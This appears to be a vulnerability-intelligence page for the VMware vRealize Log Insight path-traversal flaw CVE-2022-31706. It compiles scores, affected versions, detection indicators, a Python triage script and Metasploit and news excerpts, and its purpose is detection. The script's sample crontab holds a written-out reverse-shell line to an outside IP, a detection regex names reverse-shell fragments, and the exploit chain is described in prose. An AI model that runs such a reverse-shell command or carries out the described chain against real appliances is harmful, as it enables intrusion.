CVE-2022-31706
Published 2023-01-26
Priority P1 · 93 · critical · CVSS 3.1 9.8
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 87.08% (99.7th percentile)
The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vmware | vrealize_log_insight | 3.0 – 4.8 | — |
| vmware | vrealize_log_insight | >= 8.0.0 < 8.10.2 | 8.10.2 |
Detection & IOCs (extracted from sources)
- command: RemotePakDownloadCommand via the exposed Thrift service after obtaining the node token with the GetConfigRequest Thrift command, followed by PakUpgradeCommand
- other: Thrift RPC endpoints abused for arbitrary file write; IP address spoofing to match a master/worker node IP
- Detect version enumeration probes against the vRealize Log Insight version endpoints; an HTTP 200 whose body contains 'logInsight' or 'releaseName":' identifies a Log Insight instance, and the Nuclei template then compares the returned version against the affected ranges to decide whether it is vulnerable
- Monitor for unauthenticated GET requests to /i18n/component/JS?locale=en-US and /api/v1/version; these are the reconnaissance steps that precede exploitation
- A Check Point IPS signature is available for this CVE: 'VMware vRealize Log Insight Directory Traversal (CVE-2022-31706)' gives network-level detection
- The IP-spoofing variant requires the attacker to hold the same IP address as a master/worker node (this is the condition Horizon3 describes for the follow-on authentication bypass CVE-2023-34051, covered by the BleepingComputer item on this page); monitor for unexpected IP address additions or static IP configuration changes on vRealize Log Insight nodes
- Monitor for new or modified cron jobs on vRealize Log Insight appliances; the default PoC payload writes a cron job that establishes a reverse shell
- Monitor Thrift RPC traffic to vRealize Log Insight nodes, in particular GetConfigRequest followed by RemotePakDownloadCommand/PakUpgradeCommand sequences from unexpected sources
- CVE-2022-31706 is chained with CVE-2022-31704 (broken access control) and CVE-2022-31711 (information disclosure); treat exploitation of all three together under VMSA-2023-0001
- vRealize Log Insight is unlikely to be internet-facing; exploitation is more probable as a lateral movement technique from an already-compromised internal foothold
- Affected versions span 8.x (8.0.0 through 8.10.1) and the older 3.x/4.x branches per the Nuclei template version comparisons; 8.10.2 is the fixed release per the advisory
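The detection notes above in runnable form, as an added example written for this page (Python; it is not the Nuclei template, the Metasploit module, or any VMware code). It flags the two reconnaissance requests in web-server access lines, reads the version out of a /api/v1/version reply, compares it against the affected ranges in the table above, and scans crontab entries for reverse-shell fragments. Assumptions not stated on the page: the version reply carries the build in a "version" JSON key next to "releaseName"; the "3.0 – 4.8" row is read as every build up to and including 4.8.x; the sample access log, JSON body, build number and crontab are constructed; the cron patterns are illustrative, not the exact PoC payload.

```python
# Added example for this page: triage helpers for the CVE-2022-31706 indicators
# (reconnaissance probes, version check, cron artifacts). Not vendor/project code.
import json
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

# Affected ranges from the table on this page, as (lower inclusive, upper exclusive).
# Assumption: the "3.0 - 4.8" row covers every 3.x/4.x build up to 4.8.x, hence 4.9.0.
VULNERABLE_RANGES: List[Tuple[Version, Version]] = [
    ((3, 0, 0), (4, 9, 0)),
    ((8, 0, 0), (8, 10, 2)),  # fixed in 8.10.2 per VMSA-2023-0001
]

# Reconnaissance endpoints named in the detection notes.
RECON_PATHS = ("/api/v1/version", "/i18n/component/JS")

# Minimal combined-log-format pattern: client IP, request line, status code.
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell fragments that commonly appear in dropped reverse-shell cron jobs.
# Assumption: illustrative patterns, not the exact payload of any published PoC.
CRON_SUSPICIOUS_RE = re.compile(r"/dev/tcp/|\bnc\b.*-e|bash -i|curl [^|]*\|\s*(ba)?sh|base64 -d")


def parse_version(text: str) -> Optional[Version]:
    """Extract the leading dotted numeric version, e.g. '8.10.0-21145187' -> (8, 10, 0)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_vulnerable(version: str) -> bool:
    """True when the version falls inside one of the affected ranges."""
    v = parse_version(version)
    if v is None:
        return False
    return any(lo <= v < hi for lo, hi in VULNERABLE_RANGES)


def version_from_response(status: int, body: str) -> Optional[str]:
    """Pull the version string out of a GET /api/v1/version reply.

    A 200 whose body carries 'releaseName":' marks a Log Insight instance (per the
    detection note); the build is assumed to sit in a "version" key of the same object.
    """
    if status != 200 or '"releaseName":' not in body:
        return None
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None
    return data.get("version") if isinstance(data, dict) else None


def find_recon_probes(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, request_path) for GET probes of the reconnaissance endpoints."""
    hits = []
    for line in log_lines:
        m = ACCESS_LOG_RE.match(line)
        if not m:
            continue
        bare_path = m.group("path").split("?", 1)[0]
        if m.group("method") == "GET" and bare_path in RECON_PATHS:
            hits.append((m.group("ip"), m.group("path")))
    return hits


def suspicious_cron_lines(crontab_lines: List[str]) -> List[str]:
    """Flag non-comment crontab entries whose command looks like a reverse shell."""
    return [ln for ln in crontab_lines
            if not ln.lstrip().startswith("#") and CRON_SUSPICIOUS_RE.search(ln)]


# --- constructed sample inputs (not real captures) ---
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [26/Jan/2023:10:00:01 +0000] "GET /i18n/component/JS?locale=en-US HTTP/1.1" 200 5120',
    '203.0.113.7 - - [26/Jan/2023:10:00:02 +0000] "GET /api/v1/version HTTP/1.1" 200 48',
    '198.51.100.9 - - [26/Jan/2023:10:05:00 +0000] "POST /api/v1/sessions HTTP/1.1" 200 220',
]
SAMPLE_VERSION_BODY = '{"releaseName":"GA","version":"8.10.0-21145187"}'  # build number constructed
SAMPLE_CRONTAB = [
    "# /etc/cron.d/li-agent (constructed)",
    "*/5 * * * * root /usr/lib/loginsight/application/sbin/healthcheck",
    "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.7/4444 0>&1'",
]


def triage() -> dict:
    """Run every check over the constructed samples and return the findings."""
    version = version_from_response(200, SAMPLE_VERSION_BODY)
    return {
        "probes": find_recon_probes(SAMPLE_ACCESS_LOG),
        "version": version,
        "vulnerable": is_vulnerable(version) if version else False,
        "cron": suspicious_cron_lines(SAMPLE_CRONTAB),
    }


if __name__ == "__main__":
    print(json.dumps(triage(), indent=2))
```

Running it prints the triage findings for the samples; point `find_recon_probes` at the appliance's web access log and `suspicious_cron_lines` at the output of the node's crontab listing to use it on a real system. A probe of both endpoints from the same client inside a few seconds, followed by a Thrift connection to that node, is the sequence worth alerting on.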
CVSS provenance
- NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 9.8 CRITICAL
VMware
VMSA-2023-0001: VMware vRealize Log Insight latest updates address multiple security vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31710, CVE-2022-31711)
vendor_vmware · 2023-01-24 · CVSS 9.8
The vRealize Log Insight contains a Directory Traversal Vulnerability. VMware has evaluated the severity of this issue to be in the critical severity range with a maximum CVSSv3 base score of 9.8.
CVEs: CVE-2022-31704, CVE-2022-31706, CVE-2022-31710, CVE-2022-31711
Affected products: VMware Aria, VMware Cloud Foundation, VMware vRealize
GHSA
GHSA-653w-r2gq-wv35: The vRealize Log Insight contains a Directory Traversal Vulnerability
ghsa_unreviewed · 2023-01-26 · CVE-2022-31706 [CRITICAL] · CWE-22
VulnCheck
VMware vrealize_log_insight Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck · 2022 · CVE-2022-31706 [CRITICAL] · CVSS 9.8
Affected: VMware vrealize_log_insight
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://25491742.fs1.hubspotusercontent-eu1.net/hubfs/25491742/WAZAWAKA_TLPCLEAR_Report.pdf
Exploit PoC: https://vulncheck.com/xdb/ddb06c8c45d9
No detection rules found.
Nuclei
VMware vRealize Log Insight - Path Traversal
nuclei · CVE-2022-31706 [CRITICAL] · CVSS 9.8
Template:

```yaml
id: CVE-2022-31706

info:
  name: VMware vRealize Log Insight - Path Traversal
  author: ritikchaddha
  severity: critical
  description: |
    The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
  impact: |
    A remote, unauthenticated attacker can inject malicious files leading to remote code execution on the target appliance, resulting in complete compromise of the affect
```
Metasploit
VMware vRealize Log Insight Unauthenticated RCE
metasploit
VMware vRealize Log Insight versions 8.x contain multiple vulnerabilities, such as directory traversal, broken access control, deserialization, and information disclosure. When chained together, these vulnerabilities allow a remote, unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. This module achieves code execution via triggering a `RemotePakDownloadCommand` command via the exposed thrift service after obtaining the node token by calling a `GetConfigRequest` thrift command. After the download, it will trigger a `PakUpgradeCommand` for processing the specially crafted PAK archive, which then will place the JSP payload under a certain API endpoint (pre-authenticated) location upon
Bleepingcomputer
VMware warns admins of public exploit for vRealize RCE flaw
blogs_bleepingcomputer · 2023-10-24 · CVE-2023-34051 [CRITICAL] · CVSS 9.8
## VMware warns admins of public exploit for vRealize RCE flaw
Sergiu Gatlan
VMware warned customers on Monday that proof-of-concept (PoC) exploit code is now available for an authentication bypass flaw in vRealize Log Insight (now known as VMware Aria Operations for Logs).
"Updated VMSA to note that VMware has confirmed that exploit code for CVE-2023-34051 has been published," the company said in an update to the original advisory.
Tracked as CVE-2023-34051, it allows unauthenticated attackers to execute code remotely with root permissions if certain conditions are met.
Successful exploitation hinges on the attacker compromising a host within the targeted environment and possessing permissions to add an extra interface or static IP address, according to Horizon3 security research
Tenable
CVE-2023-20864: VMware Aria Operations for Logs Deserialization Vulnerability
blogs_tenable · 2023-04-21 · [CRITICAL] · CVSS 9.8
Checkpoint
6th February – Threat Intelligence Report
blogs_checkpoint · 2023-02-06 · CVE-2022-31711
## 6th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 6th February, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Check Point Research has flagged the Dingo crypto token, with a market cap of $10,941,525, as a scam. The threat actors behind the token added a backdoor function to its smart contract to manipulate the fee. Specifically, they used the "setTaxFeePercent" function within the token's smart contract code to manipulate the buyin
References:
- http://packetstormsecurity.com/files/174606/VMware-vRealize-Log-Insight-Unauthenticated-Remote-Code-Execution.html
- https://www.vmware.com/security/advisories/VMSA-2023-0001.html
- https://packetstorm.news/files/id/174606